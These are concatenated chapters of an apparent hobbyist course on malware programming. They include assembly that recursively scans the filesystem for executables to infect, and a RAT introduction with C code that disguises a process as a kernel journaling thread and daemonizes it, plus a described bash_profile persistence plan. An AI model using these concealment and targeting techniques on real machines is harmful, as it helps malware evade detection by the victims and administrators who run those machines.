193 | 	call   mfw_newfstatat
194 | 	
195 | 	test   al,al
196 | 	js     next		; Silently skip this file on error. Likely Permission denied
197 | 	
198 | 	;; ********************************
199 | 	;; Here the code to check the file
200 | 	;; *********************************
201 | run_payload:
202 | 	;;  For the time being just print file name
203 | 	mov  rdi, rsi
204 | 	call mfw_putln
205 | 
206 | next:
207 | 	movzx rdx, WORD [r8 + r14 + D_RECLEN] ; Get Record len | Same size thqan mov
208 | 	(...)
209 | ```
210 | 
211 | 
212 | The first part of the code just checks the file name and skips it in case it is `.` or `..` in order to avoid infinite loops. The check is done comparing against the ascii values (`0x002e` and `0x002e2e`) of both strings. For the second case, I first tried to read a `DWORD` to just do a comparison, but it looks like the size of `..` is exactly three and I was getting some random stuff in the most significant byte... any other way to do the check I thought about just ended in longer code... but let me know in the comments if you found a better way.
213 | 
214 | Then we find the call to `newfstatat`. Nothing special here, we have already used this from C, we just set the second parameter first, because we already have that value in `rdi`, so we just do that assignment first before overwriting `rdi` and we take advantage of _moving_ data between registers.
215 | 
216 | Finally we check if the syscall failed and silently continue in that case.
217 | 
218 | # Checking file type
219 | Now we need to check the file type. As we did in C, we are going to look for executable files. Note that this is a basic check and in the real world you may need to do further checks. For instance, a virus will need to check that the file is also an `ELF` binary and not just a bash script... both are executable files but their structures are pretty different. Even when it is possible to infect a `bash` file that is something you do not really need special skills to do.
220 | 
221 | This part of the code also performs the recursive call that allows us to scan the whole filesystem tree.
222 | 
223 | ```nasm
224 | 	;; Check if it is a directory
225 | 	mov  eax, DWORD [rdx + ST_MODE]
226 | 	and  eax, 0q0170000
227 | 	cmp  eax, 0q0040000
228 | 	jz   scan_folder	; If it is a directory... scan recursively
229 | 	cmp  eax, 0q0100000 
230 | 	jnz  next               ; If it is not a regular file.... skip it
231 | 	
232 | 	;; If we got a regular file then let's check permissions
233 | 	mov  eax, DWORD [rdx + ST_MODE]
234 | 	and  eax, 0q00111	; Execution permisions
235 | 	jz   next		; If no execution permision set... skip the file
236 | 	jmp  run_payload	; Otherwise run the payload on it
237 | 	
238 | scan_folder:
239 | 	;; Before the recursive call we need to store current state in the stack
240 | 	;; File descruptor and getents are already there. We just store the registers
241 | 	;; This way, we only use the memory when scanning a subfolder
242 | 	push  r8 		; Current getdents buffer
243 | 	push  r9		; Number of bytes in getents buffer
244 | 	push  r14               ; Current getendts buffer ofsset 
245 | 
246 | 	call  mfw_select_target ; RDI and RSI already set to the right parameters
247 | 	;; Restore evertything and keep going
248 | 	pop   r14		; PUSH/POP are 2 bytes long... mov reg, [bp-XX] is 4
249 | 	pop   r9
250 | 	pop   r8
251 | 	jmp   next		; Continue
252 | ```
253 | 
254 | The first thing we do is to get the `st_mode` field from the `struct stat` returned by `newfstatat`. Then we mask it with the `__S_IFMT` value that we found when developing our C version and check whether we are looking at a directory or a regular file. If the entry is a directory we jump to `scan_folder` to perform the recursive traversal of the just found subfolder, otherwise we check the permissions and if they don't match we just discard this entry and go on to process the next one.
255 | 
256 | When we call ourselves recursively to traverse the subfolders we need to store in the stack the local variables we are holding in registers for efficiency. These are `r8` (the `getdents` buffer we are processing), `r9` (the number of bytes in that buffer) and `r14` (the current offset in the buffer of the entry we are processing right now).
257 | 
258 | We could declare extra local variables in the stack as we did for the `FD`, but in this case we decided to just push and pop the values around the `call`. This way, the code is shorter and we perform that operation (saving to memory) only when it is necessary. Note that a `mov` is in principle more efficient (faster) but it produces slightly longer code (4 bytes vs the 2 bytes required by the `push/pop`).
259 | 
260 | 
261 | # The final code
262 | 
263 | As usual, this is the final code of our `select_target` function:
264 | 
265 | ```nasm
266 | 	global mfw_select_target
267 | 	extern mfw_puts
268 | 	extern mfw_putln
269 | 	extern mfw_openat
270 | 	extern mfw_newfstatat
271 | 	extern mfw_getdents
272 | 	extern mfw_close
273 | 
274 | 	section .text
275 | 	
276 | mfw_select_target:
277 | 	BUF_SIZE  EQU     0x400
278 | 	STAT_SIZE EQU     0x144
279 |   	FD	  EQU     0x08
280 |  	BUF       EQU     (FD   + BUF_SIZE)
281 | 	ST        EQU     (BUF + STAT_SIZE)
282 | 	STE       EQU     BUF
283 | 	D_NAME    EQU     0x12
284 | 	D_RECLEN  EQU     0x10
285 | 	ST_MODE   EQU     0x18
286 | 	
287 | 	;; Create Stack Frame
288 | 	push  rbp
289 | 	mov   rbp, rsp
290 | 	sub   rsp, STE
291 | 	
292 | 	;; Open Directory
293 | 	;; RDI and RSI should be all set
294 | 	mov  rdx, 0q200000 	;O_RDONLY | O_DIRECTORY
295 | 	call mfw_openat
296 | 	test al,al
297 | 	js   done1		; Exit if we cannot open the folder. Likely permission denied error
298 | 	
299 | 	mov  QWORD [rbp-FD], rax ;Store fd in local var
300 | loop0:
301 | 	mov  rdi, QWORD [rbp-FD]
302 | 	lea  rsi, [rbp-BUF]
303 | 	mov  rdx, BUF_SIZE
304 | 	call mfw_getdents
305 | 	
306 | 	test ax,ax
307 | 	jz   done		; 0 means we are done reading the folder
308 | 	js   loop0 		; <0 means error.... we just try again
309 | 
310 | 	mov r9, rax		; Loop limit
311 | 	lea r8, [rbp-BUF] 	; Points to struct linux_dirent record
312 | 	xor r14,r14 		; Loop counter = 0
313 | 
314 | loop1:
315 | 	lea   rdi, [r8 + r14  + D_NAME] ; Offset to current dirent name
316 | 	
317 | 	;; Skip . and .. names
318 | 	;; ---------------------------
319 | 	cmp WORD [rdi], 0x002e
320 | 	je next
321 | 	cmp WORD [rdi], 0x2e2e
322 | 	jne check_file
323 | 	cmp BYTE [rdi+2], 0
324 | 	je next
325 | 	
326 | 	;; Check file type and permissions
327 | check_file:	
328 | 	lea    rsi, [rdi]	    ; Par2 : name
329 | 	mov    rdi, [RBP - FD]  ; Par1 : fd
330 | 	lea    rdx, [RBP - ST]  ; Par3 : struct stat
331 | 	xor    rcx, rcx		    ; Par4 : flags
332 | 	call   mfw_newfstatat
333 | 	
334 | 	test   al,al
335 | 	js     next		; Silently skip this file on error. Likely Permission denied
336 | 	
337 | 	;; Check if it is a directory
338 | 	mov  eax, DWORD [rdx + ST_MODE]
339 | 	and  eax, 0q0170000
340 | 	cmp  eax, 0q0040000
341 | 	jz   scan_folder	; If it is a directory... scan recursively
342 | 	cmp  eax, 0q0100000 
343 | 	jnz  next               ; If it is not a regular file.... skip it
344 | 	
345 | 	;; If we got a regular file then let's check permissions
346 | 	mov  eax, DWORD [rdx + ST_MODE]
347 | 	and  eax, 0q00111	; Execution permisions
348 | 	jz   next		    ; If no execution permision set... skip the file
349 | 	jmp  run_payload	; Otherwise run the payload on it
350 | 	
351 | scan_folder:
352 | 	;; Before the recursive call we need to store current state in the stack
353 | 	;; File descruptor and getents are already there. We just store the registers
354 | 	;; This way, we only use the memory when scanning a subfolder
355 | 	push  r8 		; Current getdents buffer
356 | 	push  r9		; Number of bytes in getents buffer
357 | 	push  r14       ; Current getendts buffer ofsset 
358 | 
359 | 	call  mfw_select_target ; RDI and RSI already set to the right parameters
360 | 	;; Restore evertything and keep going
361 | 	pop   r14		; PUSH/POP are 2 bytes long... mov reg, [bp-XX] is 4
362 | 	pop   r9
363 | 	pop   r8
364 | 	jmp   next		; Continue
365 | 	
366 | run_payload:
367 | 	;;  For the time being just print file name
368 | 	mov  rdi, rsi
369 | 	call mfw_putln
370 | 
371 | next:
372 | 	movzx rdx, WORD [r8 + r14 + D_RECLEN] ; Get Record len | Same size thqan mov
373 | 	add r14,rdx
374 | 	cmp r14, r9
375 | 	jge loop0                ; If it is zero, get more data
376 | 	jmp loop1
377 | 	
378 | done:	
379 | 	;; Close directory
380 | 	mov rdi, QWORD [rbp-FD]
381 | 	call mfw_close
382 | done1:	
383 | 	leave     		; Set RSP=RBP and pops RBP
384 | 	ret
385 | 
386 | ```
387 | 
388 | # Conclusions
389 | As I said this was very short, we already know a lot of assembler and system programming to code this part so this was just work we had to do. We took the chance to talk a little bit about number representation, and we got a recursive function working in assembly... which is not that hard once we learned what that involves in the previous instalments.
390 | 
391 | For the next instalment we should start looking into some payload.... I envision a first theoretical instalment to introduce the related concepts before jumping in to the code....
392 | 
393 | So, now it is time for you to decide:
394 | 
395 | [poll type=regular results=always chartType=bar]
396 | * VIRUS
397 | * RANSOMWARE
398 | * SPYWARE
399 | * RAT
400 | [/poll]
401 | 
402 | 
403 | ## Read the whole series here
404 | [Part IX. Finding Files in asm](https://0x00sec.org/t/programming-for-wanabes-ix-finding-files-in-asm/25794)
405 | [Part VIII, File Details](https://0x00sec.org/t/programming-for-wanabes-viii-file-details/25738)
406 | [Part VII. Finding files](https://0x00sec.org/t/programming-for-wanabes-vii-finding-files-i/25662)
407 | [Part VI. Malware Introduction](https://0x00sec.org/t/programming-for-wannabes-part-vi-malware-introduction/25595)
408 | [Part V. A dropper](https://0x00sec.org/t/programming-for-wannabes-part-v-a-dropper/23090)
409 | [Part IV. The stack](https://0x00sec.org/t/programming-for-wannabes-part-iv/22421)
410 | [Part III. Your first Shell Code](https://0x00sec.org/t/programming-for-wannabees-part-iii-your-first-shell-code/1279)
411 | [Part II and a Half. Part II for ARM and MIPS](https://0x00sec.org/t/programming-for-wannabes-part-ii-and-a-half/1196)
412 | [Part II. Shrinking your program](https://0x00sec.org/t/programming-for-wannabes-part-ii/1164)
413 | [Part I. Getting Started](https://0x00sec.org/t/programming-for-wannabes-part-i/1143)
414 | 


--------------------------------------------------------------------------------
/part-11.md:
--------------------------------------------------------------------------------
  1 | # Programming for Wanabes XI. Introduction to RATs
  2 | So my 0x00sec fellows've spoken and RATs will be. As anticipated in this first instalment we will mostly discuss theoretical concepts, which means not much code.... but will be some :). Let's start.
  3 | 
  4 | RAT stands for `Remote Access Trojan`; actually the last `T` could also be _Tool_ instead of _Trojan_, and then we would be talking about common tools used in corporate environments instead of malware. Conceptually both things do the same, i.e. allow a third party to remotely access and control a computer. Or, if you prefer, they allow someone to break the privacy of people. The difference is that in some cases there is some official and even legal support to install and run the tool and in the others... no. In any case, and most of the time, the users do not have a clue of what is going on :).
  5 | 
  6 | # RAT's functionality
  7 | The ultimate goal of a RAT is to provide root shell access to the machine (or Administrator access if you prefer). Right, a _Backdoor_ is, somehow, the simplest form of a RAT. It is true that many RATs provide specific functions like capturing video or audio, stealing credentials, etc... however all these actions are pretty straightforward whenever you have privileged access to the machine. Or in other words, when you are able to upload and run any SW you want.
  8 | 
  9 | So, I will keep aside specific task to perform in the victim as the one mentioned above for the time being, and get focused on the actual core of the RAT: enabling remote access. For doing this, we need the following:
 10 | 
 11 | * Remote Shell Access (execute specific commands is a kind of subset of this)
 12 | * Secure communication with a third party. That third-party will usually be a C2C application controlled by the attacker. This implies general data interchange (commands and responses but also file transfers in both directions)
 13 | 
 14 | We will look into this again in the context of this course, but I have already written about this in [here](https://0x00sec.org/t/remote-shells-part-i/269), [here](https://0x00sec.org/t/remote-shells-part-ii-crypt-your-link/306), [here](https://0x00sec.org/t/remote-shells-part-iii-shell-access-your-phone/508) and [here](https://0x00sec.org/t/remote-shells-part-iv-the-invisible-remote-shell/743)... 
 15 | 
 16 | On top of that, and I said on top, because what come next are orthogonal functions in the sense that they are used by many other types of malware and not specifically for RATs:
 17 | 
 18 | * Privilege Escalation. 
 19 | * Hiding
 20 | * Network Pivoting (Optional)
 21 | * Persistence (Optional)
 22 | 
 23 | ## Privilege Escalation
 24 | This is a two-manifold topic. In one hand, it is common to have enumeration utilities available in the RAT infrastructure (either as part of the RAT or as a module that can be downloaded in the victim) to help the attacker get an administrator account. 
 25 | 
 26 | Imagine that the RAT got executed using some Social Engineering technique. In such a case, it will likely be executed as an unprivileged user, and the attacker will try to escalate that situation in order to have full access to the machine. 
 27 | 
 28 | On the other hand, the enumeration tools just provides the information about potential vulnerabilities in the machine. Then appropriated exploits are required in order to make those vulnerabilities into advantages to escalate user privileges.
 29 | 
 30 | Note that, some times the RAT gets executed already using a vulnerability (either local or remote) that gives it superuser privileges from time zero. In those cases the enumeration functions are just taking space and are not useful... Well, not exactly... What does this mean is that this kind of malware many times have a module/plug-in subsystem to enable the activation (and alternative download from the C2C) of functions when needed. Such a system in a malware context may be a bit complex, as sometimes you cannot just use standard functions provided by the system.
 31 | 
 32 | ## Hiding
 33 | Other function that most RAT implement is some kind of hiding capabilities. There are a few options on how to do this, depending on how secure is the target system.
 34 | 
 35 | * __Hide on-sight__. On low-security systems sometimes it is just enough to give the RAT a cryptic-system-like name to make it invisible. Imagine the machine of a regular user that has just been compromised, for instance, to be used in a proxy chain or to become a zombie in a Botnet. You can just call your RAT something like `[kworker/u12:7]` and not even an advanced user may pay attention to it.
 36 | * __Install a rootkit__. Supposing the attacker has got root access to the machine s/he would easily install a rootkit to hide all tracks related to the RAT. Note that on a decently hardened machine kernel module loading would likely be disabled and run-time kernel patching may not be possible so maybe a user-space rootkit may be the only alternative.
 37 | * __Insert the RAT in a running process__. In this case, the RAT gets itself copied into a running process and executed inside it, usually as a thread. This is a pretty stealthy technique. For instance, imagine a Firefox that is already running: you will see Firefox connections to many different servers (supposing you have a hundred tabs open as everybody does), together with the connection to the C2C machine. The basis of this is briefly described [here](https://0x00sec.org/t/running-binaries-without-leaving-tracks/2166). This technique also requires superuser permissions and makes persistence a bit tricky.
 38 | 
 39 | ## Network Pivoting
 40 | This is an optional feature. It is common for RATs targeting corporate environments where it is relatively easy (using social engineering for instance) to get into a machine with limited privileges from outside the network, and then reach internal machines, not accessible from the Internet, just jumping between different servers within the network. Sometimes the RAT offers a kind of proxy/router capability to connect the C2C to those internal machines.
 41 | 
 42 | Network pivoting can actually be seen as a special case of privilege escalation, where the privileges are raised by accessing machines that may have access to services that other machines may not.
 43 | 
 44 | I bet all of you know what I'm talking about, but just in case. Imagine a web application. The front-end (all those pages and Javascripts) is accessible from the internet, but the back-end, the machine with the database and all the business logic is not, it only can be accessed from inside the target network.
 45 | 
 46 | As I said, network pivoting is a kind of systematic approach consisting on enumerating nearby computers accessible from the current compromised machine, determining any vulnerability or weak configuration, and then accessing it copying the RAT over and executing it there and effectively starting the process again from that machine.
 47 | 
 48 | Imagine for instance a machine in a corporate network. It has internet access, but the user also has access to some laboratory machines from that computer using SSH. Imagine that the user has configured ssh passwordless, what is pretty common specially when you need to access many machines remotely... Then we will have direct access to that machine for free...
 49 | 
 50 | ## Persistence
 51 | 
 52 | Finally, this functionality is also optional and depends on the nature of the attack. As mentioned before in this course, persistence is the capability of a malware to keep executing despite of being stopped for whatever reason (usually a reboot).
 53 | 
 54 | In general, a RAT will like to have some persistence mechanism, so the access to the machine is not lost after a reboot, or whenever the process dies for whatever reason. Persistence, usually implies writing something somewhere in the disk... because the disk is the memory on the computer that will survive reboots (if by a chance the target have other persistent storage, that would also be an option, think about flash memory in embedded platforms).... And not just that, further disk modifications are required in order to execute again that SW saved in that persistent memory.
 55 | 
 56 | Very advanced RAT targeting network environments, just act like a virus/worms. They have the capability to infect other machines so, after an initial attack enough machines in the network will be infected to ensure that after rebooting any of them, there will be some instance of the malware running in the network that will infect again that machine. This is a very smart and powerful technique as the attacker is not storing anything on the disk at the same time that it achieves persistence... Anyhow, as you can see, this will not work on all cases and it targets a very specific environment.
 57 | 
 58 | # Let's write a RAT: r4t0x0
 59 | 
 60 | Our first RAT is going to be damn simple, but it is going to be a complete/real RAT. Let's go for the following:
 61 | 
 62 | * Hide on-sight
 63 | * Basic Persistence
 64 | * Remote shell
 65 | 
 66 | If we recall our original malware skeleton, the two first features have to be implemented in the `init` function. 
 67 | 
 68 | _Note: In this instalment we will just drop the code on `main` as it will be just a few lines._
 69 | 
 70 | For persistence we will be going low profile, just store the file on the home folder of the user looking like a configuration file and silently patch `bash_profile` to launch it on each user session. A more sophisticated RAT could, for instance, determine the actual shell being used and patch the appropriate start-up files or look for a folder in the home directory containing many files so the RAT will be more stealth. 
 71 | 
 72 | As I said we are going to keep it simple. The point of this exercise is that you understand how this works so, you will be able to extend the program to test any other technique you want to learn about or experiment with. Once you understand the basics you will be in the position to analyse different protection systems and start to try to figure out how to overcome... and then how to modify the protection system to detect you RAT, and then break it again,... and so forth. Lots of fun ahead.
 73 | 
 74 | Finally, the `remote shell` will be our main `payload`. In this case, as we mentioned in the [malware introduction](https://0x00sec.org/t/programming-for-wannabes-part-vi-malware-introduction/), RATs runs on an interactive loop, so there is no target selection function to feed the payload.
 75 | 
 76 | We will be going through the different features of the RAT one by one from scratch, so you will see a _possible_ process on how to determine what is the issue you want to solve and how to solve it step by step until you reach your goal. As it happens with many other problems in real life, the key point is to get to know what is the problem you want to solve... this seems pretty trivial, but many times people lost the point and end up overcomplicating things that doesn't really add to the solution of the problem. Anyhow, I hope the approach we are going to follow will help you not only to write malware or tools to detect malware, but to solve problems in general... That is the important thing to learn.
 77 | 
 78 | Let's get started with the first point.
 79 | 
 80 | # Hiding on-sight
 81 | Our goal here is to keep the RAT low profile and avoid it to be detected. As we discussed in the introduction sometimes just changing your name and being quiet will be more than enough to go unnoticed. 
 82 | 
 83 | The easiest way is to give the process the name of some system thread. Not even an advanced user will be able to spot the RAT on `ps` or `top` at first (or any other tools actually). However... your program has to be properly coded and be efficient, otherwise... seeing something that looks like a system thread taking 100% of the CPU, and popping on top of `top` all the time.... well, that will be suspicious. And then it is just a matter of time to get discovered.
 84 | 
 85 | Let's see how all this works. We will be using `ps`, but most monitoring tools work the same, actually reading data from `/proc/PID`. 
 86 | 
 87 | You can now run a `ps -ax` on your system and take a look at what you get. You can also install different distros on VMs and check differences between distros and kernels to choose a name that fits well on more platforms. These are some examples I get from an Ubuntu machine:
 88 | 
 89 |        10 ?        S      0:00 [migration/0]
 90 |        13 ?        S      0:00 [cpuhp/1]
 91 |        14 ?        S      0:03 [watchdog/1]
 92 |        22 ?        S      0:04 [ksoftirqd/2]
 93 |        24 ?        I<     0:00 [kworker/2:0H]
 94 |        46 ?        S      0:01 [ksoftirqd/6]
 95 |        48 ?        I<     0:00 [kworker/6:0H]
 96 |       358 ?        S      0:27 [jbd2/sda5-8]
 97 |       991 ?        S      1:01 [jbd2/sda6-8]
 98 |      2189 ?        S      0:00 [nfsd]
 99 |      2190 ?        S      0:00 [nfsd]
100 |      2191 ?        S      0:00 [nfsd]
101 | 
102 | There are many more options, just take a look on your own system. 
103 | 
104 | User space programs are more susceptible to be noticed by the user/administrator, but, for instance in the example above, you can see a few threads of the kernel NFS server running... They all look the same, so it is likely that nobody will notice an extra line like those (except for the sequential PIDs)... However not everybody runs an NFS server... the `kworker` option sounds better but the process status is `I`. That means it is a kernel `Idle` task, which I believe is a state we cannot reach from user space... But I haven't researched this. Let me know in the comments if you can get that.
105 | 
106 | `jbd2` is the _Journaling Block Device_ thread; it will basically be there whenever you use a file system with journaling capabilities like `ext3` or `ext4`, common on GNU/Linux boxes. It appears with an `S` status, which means _Sleeping_, and that is what our RAT will do most of the time, so, let's go for this one.
107 | 
108 | We will change the process name, but we will also try to mimic the other columns values. A normal user will not notice those but a system administrator will and may find them suspicious, so we better are methodical. When we are done with this you will find a funny coincidence...
109 | 
110 | ## Changing a process name
111 | Let's first take a look to how does a normal process looks like. Let's compile this simple program that just go into sleep mode waiting for some user input (that is what `getchar` does... gets a char):
112 | 
113 | ```C
114 | #include <stdio.h>
115 | #include <string.h>
116 | 
117 | int main (int argc, char *argv[]) {
118 |   printf ("This is RAT0X0 version 0.1\n");
119 |   getchar ();
120 | }
121 | ```
122 | 
123 | Now, let's compile and run it and on a different terminal let's see how `ps` sees this simple process:
124 | 
125 |     $ ps -ax | grep rat
126 |     (...)
127 |     23022 pts/24   S+     0:00 ./rat0x0-01
128 | 
129 | That doesn't look promising. We could already change the name to `jbd2SOMETHING` on the disk before running the program but that will be suspicious and unlikely to be executed by a user.... We should assume that the program will have an arbitrary name.
130 | 
131 | The simplest way to change the name is to overwrite the `argv[0]` parameter that is actually the file name of the program being executed:
132 | 
133 | ```C
134 | #include <stdio.h>
135 | #include <string.h>
136 | 
137 | int main (int argc, char *argv[]) {
138 |   printf ("This is RAT0X0 version 0.1\n");
139 |   strcpy (argv[0],"[Jbd2/sda0-8]");
140 |   getchar ();
141 | }
142 | 
143 | ```
144 | 
145 | > Note: In principle your target name shall have the same length or less than the original one so it will fit in the current assigned memory. Otherwise you will need to shuffle around the stack to make room for the extra characters...
146 | 
147 | Let's try:
148 | 
149 |     $ ps -ax | grep rat
150 |     (...)
151 |     23431 pts/39   S+     0:00 grep rat
152 | 
153 | No trace of `rat0x0`. Let's see how this new `jbd2` looks like:
154 | 
155 |     $ ps -ax | grep bd2
156 |        358 ?        S      0:27 [jbd2/sda5-8]
157 |        991 ?        S      1:01 [jbd2/sda6-8]
158 |      23371 pts/24   S+     0:00 [Jbd2/sda0-8]
159 | 
160 | I have just added a capital `J` to easily identify the process during development (you will have to kill it a few times). Note that `sda0` is not a valid partition name so it should be safe... alternatively you could also swap the `b` and the `d` in the name and use a valid partition name... Well, you can try different options to choose a name that will be unnoticeable, at least at first glance...
161 | 
162 | However, note that when people suspect that there is something dodgy going on, they will start looking at the details and sooner rather than later this will be uncovered... As I said this is the most simplistic way to hide your RAT. And it works as long as nothing suspicious happens.
163 | 
164 | Anyhow, our process still shows a PTY (that means it is associated to a terminal) and also there is a `+` after the `S` that indicates that it is in the foreground.
165 | 
166 | # Going background
167 | What comes next is basically the process you follow to code a classical daemon. Yes, no hacker/malware developer black magic... just good old system programming. When writing a daemon you need to disconnect the process from any terminal, session and process group so the process doesn't get terminated unexpectedly. You do a couple of things more, but that is the very minimum to become a `daemon`. Let's go step by step.
168 | 
169 | First, let's go background.
170 | 
171 | The way to achieve this is to `fork` and kill our parent. All this process management things always sounds funny when explained with words :). When we `fork`, we create a new process that is an exact copy of the original one. The only difference between the father and the child is that, after `fork` the PID of the child is returned to the father and 0 is returned to the child. Both process continuing execution in the line just after `fork` in the program. Usually the father process creates a child to do something and get some result, so it will have to eventually wait for the process to finish and for that it needs the PID (well, it is better to know it). The child doesn't need that, and can get its PID at any time just calling `getpid()`. No it won't know its parent.  Our powerful `rat0x0` will look like this now
172 | 
173 | ```C
174 | #include <stdio.h>
175 | #include <unistd.h>
176 | #include <string.h>
177 | 
178 | int main (int argc, char *argv[]) {
179 |   printf ("This is RAT0X0 version 0.1\n");
180 |   strcpy (argv[0],"[Jbd2/sda0-8]");
181 |   pid_t pid = fork();
182 |   if (pid!=0) return 0;
183 | 
184 |   while (1) usleep (1000);
185 | }
186 | ```
187 | 
188 | As you can see we just create a new copy of ourselves using `fork` and then we kill the parent (the one that received a PID different of 0). I have also removed the `getchar` because we are trying to get our process disconnected from the terminal and that is a function that uses `stdin`.
189 | 
190 | If we run this process, `ps` will show now this:
191 | 
192 |     $ ps -ax | grep bd2
193 |       358 ?        S      0:27 [jbd2/sda5-8]
194 |       991 ?        S      1:01 [jbd2/sda6-8]
195 |     26956 pts/24   S      0:00 [Jbd2/sda0-8]
196 | 
197 | Great... We have got rid of the `+`... But we still have an associated terminal to our process.
198 | 
199 | # Getting rid of the terminal
200 | The way to release the terminal associated to the process is to actually leave the current session. I'm not going to go into the details about session and process groups here. In simple words, you start a session when you log-in. Any process you create after that belongs to the session. This allows the system to know which process to kill when the session is closed by the user. Did you ever wonder how the OS magically know what to kill if you just leave your session?
201 | 
202 | Daemons, and also our cute RAT do not want to get killed when the user closes the session from which they were started... well, daemons are usually started by the system at start up, but just in case you start one of them manually in a terminal. The way to do this is to create a new session for our process. And we do this with the `setsid` system call:
203 | 
204 | ```C
205 | #include <stdio.h>
206 | #include <unistd.h>
207 | #include <string.h>
208 | 
209 | int main (int argc, char *argv[]) {
210 |   printf ("This is RAT0X0 version 0.1\n");
211 |   strcpy (argv[0],"[Jbd2/sda0-8]");
212 |   pid_t pid = fork();
213 |   if (pid!=0) return 0;
214 |   setsid ();
215 |   while (1) usleep (1000);
216 | }
217 | ```
218 | 
219 | Now we can compile and check again:
220 | 
221 |     $ ps -ax | grep bd2
222 |       358 ?        S      0:27 [jbd2/sda5-8]
223 |       991 ?        S      1:01 [jbd2/sda6-8]
224 |     27496 ?        Ss     0:00 [Jbd2/sda0-8]
225 | 
226 | 
227 | Damn, what is that `s` that just popped up?
228 | 
229 | # Stop being a Session Leader
230 | If you read the man page for `setsid` it says:
231 | 
232 | > setsid()  creates  a new session if the calling process is not a process group leader.  The calling process is the leader of the new session (i.e., its session ID is made the same as its process ID).  The calling process also becomes the process group leader  of  a new process group in the session (i.e., its process group ID is made the same as its process ID).
233 | 
234 | Also you can check the man page for `ps` to verify what the `s` means in its output.
235 | 
236 | Done?... There you go... That is what and where the `s` is/comes from. So, to stop being a session leader for this session, we have to... `fork` again.
237 | 
238 | ```C
239 | #include <stdio.h>
240 | #include <unistd.h>
241 | #include <string.h>
242 | 
243 | int main (int argc, char *argv[]) {
244 |   pid_t pid;
245 |   printf ("This is RAT0X0 version 0.1\n");
246 |   strcpy (argv[0],"[Jbd2/sda0-8]");
247 |   if ((pid = fork()) != 0) return 0;
248 |   setsid(); // Remove TTY
249 |   if ((pid = fork()) != 0) return 0;
250 | 
251 |   while (1) usleep (1000);
252 | }
253 | 
254 | ```
255 | 
256 |     $ ps -ax | grep bd2
257 |       358 ?        S      0:27 [jbd2/sda5-8]
258 |       991 ?        S      1:01 [jbd2/sda6-8]
259 |     27742 ?        S      0:00 [Jbd2/sda0-8]
260 | 
261 | And there you go.... Same fingerprint than the kernel processes.... Well, the PID is way higher... Nobody is perfect.
262 | 
263 | > PIDs are reused when the maximal PID number is reached. This value is defined at `/proc/sys/kernel/pid_max` and usually is 32768... So you can start forking and exiting processes until you get a PID below 1000/2000... Haven't tried this but it should work... Just do not fork too fast or you will look like a fork bomb
264 | 
265 | The code above is pretty simple and you should be able to code the assembler version by yourself. Just add the two new system calls in the `mfw.asm` file and do a couple of comparisons and conditional jumps. If you do not want to do it yourself and you have any issue, feel free to ask and, in any case, I will add the code in a later instalment anyway.
266 | 
267 | # Conclusion
268 | In this instalment we have gone quickly through the main features of a RAT and after that we have defined a simple one to use as an example in the coming instalments. It has very few features so we can keep it simple while we learn more about our system. So far we have learnt how to manipulate the way the process is shown by system tools like `ps` and `top`... and at the same time, accidentally :), we have learnt how to convert any program into a `daemon`. So far, `rat0x0` just looks like a regular system daemon... nothing really special about it. That is the key of a good RAT... just look normal.
269 | 
270 | 
271 | 


--------------------------------------------------------------------------------
/part-02.md:
--------------------------------------------------------------------------------
  1 | # Programming for Wannabes. Part II
  2 | 
  3 | Glad to see you have come back to this humble course. Hope you are eager to get a lot more stuff to digest. Grab some coffee and relax.
  4 | 
  5 | I have been claiming that this course is going to be different to all those that you find over the Internet. Right now, I should introduce a whole bunch of boring things (numeric representation, addressing modes, instructions groups,...) and guess what?... I won't do that.
  6 | 
  7 | In order to avoid going through all that boring stuff and to try to follow a learn-by-example approach, we need to be able to build programs. In the previous part we've got a glimpse of that, but we cannot yet produce an executable out of some assembly code.
  8 | 
  9 | Furthermore, in the previous part we started looking to the HW to help us introduce some concepts. In this part, we are going to look a bit to the upper layers and how they lay one over the other.
 10 | 
 11 | Finally, you need to know that we are going to use `nasm` in this course. This is a very well-known and powerful assembler that will help us to produce machine code out of our assembly code. So, before you keep reading, go and install it!
 12 | 
 13 | # Our First Assembly Program
 14 | So, let's start with the simplest, Linux OS-compliant program we can write. There you go:
 15 | 
 16 | ```nasm
 17 | 	global _start
 18 | _start:	mov rdi, 10
 19 | 	mov rbx, 20
 20 | 
 21 | 	add rdi,rbx
 22 | 
 23 | 	mov rax, 0x3c
 24 | 	syscall
 25 | ```
 26 | 
 27 | Well, the central part of the program should look familiar to you by now. We are using different registers in this case, but we are again adding two numbers. There are two main  differences with respect to our previous example:
 28 | 
 29 | - First, we are defining a symbol that will be `global` and will mark up the first instruction of our program. That is the `_start`. Try to remove the `global` declaration and you will get an error when you try to compile it saying that the `_start` symbol cannot be found.
 30 | - We have two new instructions at the very end. We will explain these in detail in a sec, but first let's compile and run the program to check that we are good to go.
 31 | 
 32 | Let's compile our program:
 33 | 
 34 |     $ nasm -f elf64 -o c2-1.o c2-1.asm
 35 |     $ ld -o c2-0s c2-1.o
 36 |     $ ./c2-0s; echo $?
 37 |     30
 38 | 
 39 | Very good. We have built an executable out of our assembly source code and when we run it, the program returns the result of our operation. I believe this is the simplest ASM program you can actually write that does something. Yep, the bash variable `$?` contains the return value of the last executed command. Try to change the numbers in the ASM file, recompile and check that the `$?` will contain the sum.
 40 | 
 41 | So.... we have something to start to work with.... and a lot of things to explain.
 42 | 
 43 | # Producing an Executable
 44 | Let's start from the last step. The generation of the binary. To produce a program out of an ASM source code, we will have to convert it into machine code and then convert it into a program that can be executed by a given OS. Sometimes we do this in just one step, but it is actually two separate stages.
 45 | 
 46 | As you should know by now, we are working with Linux. The default executable format is ELF. We are writing 64bits ASM, so we will tell our assembler that we need some object code (that's the name for those .o files you obtain from your assembler or compiler) in a specific format. In this case `elf64`. We use the command-line flag `-f` to specify that. The `-o` stands for _output_ and lets us indicate the file where we want the result stored. Then we just append the list of source files to assemble.
 47 | 
 48 | Using the right format for our object code, is important, because that will allow us to use all other standard tools in the system. One of those tools is the linker.
 49 | 
 50 | Let's look to the standard process of producing an executable:
 51 | 
 52 | - The **source code** (in any language) is converted to **object code**. This is done by the compiler. An assembler can be seen as a compiler for assembly code.
 53 | - The **object code** is not directly executable. It needs to be converted into an application, and this task is done by the linker. In our case we have one single object file but, in general, an application is composed of multiple object files (coming from different source code files), static libraries, dynamic libraries, etc... The linker is the program that _links_ all those pieces together, and it does this in a way that the OS can make sense out of it.
 54 | 
